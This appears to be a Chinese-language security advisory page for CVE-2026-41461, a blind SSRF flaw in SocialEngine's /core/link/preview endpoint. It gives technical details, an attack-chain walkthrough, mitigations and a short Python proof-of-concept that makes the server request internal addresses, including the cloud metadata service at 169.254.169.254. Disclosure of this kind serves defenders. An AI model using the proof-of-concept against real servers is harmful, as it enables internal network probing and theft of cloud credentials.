CVE-2026-41461 CVSS 8.5 高危

CVE-2026-41461 SocialEngine盲SSRF漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41461

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SocialEngine

漏洞概述

SocialEngine 7.8.0及更早版本存在严重的盲服务器端请求伪造（SSRF）漏洞。该漏洞源于`/core/link/preview`端点未能正确清理用户输入，经过身份验证的攻击者可利用`uri`参数传入恶意URL。这会导致服务器代为向内部网络或环回地址发起HTTP请求，进而实现内网服务探测、敏感信息窃取等攻击行为。

技术细节

该漏洞的根本原因在于SocialEngine处理链接预览功能时缺乏严格的输入验证机制。具体而言，应用程序在`/core/link/preview`接口中直接接收用户通过`uri`参数提交的URL字符串，且未对该参数进行格式校验、内网IP地址过滤或协议限制。攻击者一旦拥有低权限账户，即可构造包含内网IP地址（如127.0.0.1、192.168.x.x或169.254.169.254）的恶意请求。服务器在接收到请求后，会代替客户端向该内网地址发起HTTP连接。由于这是一个盲SSRF漏洞，攻击者通常无法直接获取响应内容，但可以通过观察响应时间差异、结合DNS外带技术（如DNSLog）或利用带外信道（OOB）来验证请求是否成功。这使得攻击者能够探测内网端口开放情况、访问云平台元数据服务窃取凭证，或对内部资产进行进一步扫描和攻击。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个低权限账户，满足CVSS向量中的PR:L（低权限）要求。

STEP 2

2. 构造恶意请求

攻击者向`/core/link/preview`端点发送GET请求，并在`uri`参数中填入内网地址（如127.0.0.1）或攻击者控制的域名（用于OOB检测）。

STEP 3

3. 服务器端请求

由于未对`uri`参数进行过滤，SocialEngine服务器解析请求并向攻击者指定的内部地址发起HTTP连接。

STEP 4

4. 信息泄露

攻击者根据响应时间差异或带外数据（如DNS解析记录），判断内网端口是否开放或获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (SocialEngine instance)
target = "http://socialengine.example.com/core/link/preview"

# Attacker's controlled server for Out-of-Band detection or internal IP
internal_ip = "http://192.168.1.1/admin"
# Or use a metadata service like: http://169.254.169.254/latest/meta-data/

# Payload parameters
params = {
    "uri": internal_ip,
    "format": "json"
}

# Authenticated session cookies (Required as per PR:L)
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

try:
    response = requests.get(target, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check server logs or OOB listener for confirmation.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

SocialEngine <= 7.8.0

防御指南

临时缓解措施

对于无法立即升级的用户，建议在Web应用防火墙（WAF）中添加规则，拦截发往`/core/link/preview`接口且包含`uri`参数的请求。同时，应通过操作系统层面的防火墙（如iptables）限制应用服务器对外发起HTTP/HTTPS连接的权限，仅允许访问业务必需的外部API。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-41461
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-41461
3 Details https://www.cvedetails.com/cve/CVE-2026-41461/
4 VulDB https://vuldb.com/cve/CVE-2026-41461
5 Link https://karmainsecurity.com/KIS-2026-07
6 Link https://socialengine.com
7 Link https://www.vulncheck.com/advisories/socialengine-blind-ssrf-via-core-link-preview
8 Link http://seclists.org/fulldisclosure/2026/Apr/11

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表